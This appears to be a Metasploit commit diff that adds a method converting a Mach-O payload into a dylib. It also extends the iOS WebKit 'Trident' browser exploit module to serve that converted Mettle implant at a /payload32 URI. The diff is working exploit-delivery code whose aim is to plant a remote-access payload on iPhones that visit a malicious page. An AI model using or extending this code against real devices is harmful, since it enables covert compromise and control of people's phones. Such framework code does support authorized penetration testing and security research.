convert payload to dylib

2018-10-10 23:34:56 +08:00 · 2018-10-10 23:34:56 +08:00 · fe356dabca
parent 4653cbdda1
commit fe356dabca
2 changed files with 21 additions and 0 deletions
--- a/lib/msf/core/payload/macho.rb
+++ b/lib/msf/core/payload/macho.rb
@ -44,5 +44,19 @@ class Msf::Payload::MachO
    output_data
  end

+  def to_dylib(name)
+    new_lc = MachO::LoadCommands::LoadCommand.create(:LC_ID_DYLIB, "@executable_path/#{name}.dylib", 0, 0, 0)
+    @macho.add_command(new_lc)
+
+    raw_data = @macho.serialize
+    raw_data[12] = MachO::Headers::MH_DYLIB.chr
+    raw_data[36,7] = "__ZERO\x00"
+    raw_data
+  end
+
+  def raw
+    @macho.serialize
+  end
+
 end

--- a/modules/exploits/apple_ios/browser/webkit_trident.rb
+++ b/modules/exploits/apple_ios/browser/webkit_trident.rb
@ -73,6 +73,13 @@ class MetasploitModule < Msf::Exploit::Remote
      send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
      print_status("Sent exploit (#{loader_data.size} bytes)")
      return
+    elsif request.uri =~ %r{/payload32$}
+      macho = Msf::Payload::MachO.new(payload.raw)
+      macho.to_dylib('mettle')
+      payload_data = macho.raw
+      send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})
+      print_status("Sent payload (#{payload_data.size} bytes)")
+      return
    end
    html = %Q^
 <html>